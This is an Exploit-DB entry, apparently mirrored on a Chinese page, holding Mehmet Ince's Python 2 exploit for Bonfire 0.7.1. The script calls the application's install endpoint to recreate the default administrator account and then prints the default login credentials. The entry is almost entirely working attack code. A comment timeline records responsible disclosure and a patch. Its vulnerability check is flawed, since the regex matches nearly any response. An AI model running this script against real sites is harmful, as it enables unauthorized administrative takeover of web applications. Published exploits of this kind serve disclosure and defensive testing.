Bonefire 0.7.1 – Reinstall Admin Account

  • 作者: Mehmet Ince
    日期: 2014-04-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/32999/
  • #!/usr/bin/env python
    # coding: utf-8
    #
    # Bonefire v.0.7.1 Reinstall Admin Account Exploit
    #
    # Author : Mehmet INCE
    # 
    # Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
    #
    # Description : 
    # Forgotten controls lead to call install module which lead to
    # create default administrator account again!
    #
    # TIMELINE
    # 21 Apr 2014 14:00 –Vulnerability found
    # 23 Apr 2014 21:20 – Analysis and write-up completed
    # 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
    # 23 Apr 2014 21:33 – Response from lead developer
    # 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
    # 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
    # https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
    
    import urllib2
    import sys
    import re
    target = sys.argv[1]
    path = sys.argv[2]
    
    if len(sys.argv) > 3:
     print "Usage : python bonfire www.target.com /path/"
     exit(0) 
    
    content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
    
    if re.search('[admin@mybonefire.com]', content):
     print "Target is vulnerable!"
     print "Username : admin@mybonefire.com"
     print "Password : password"
    else:
     print "Target is not vulnerable..."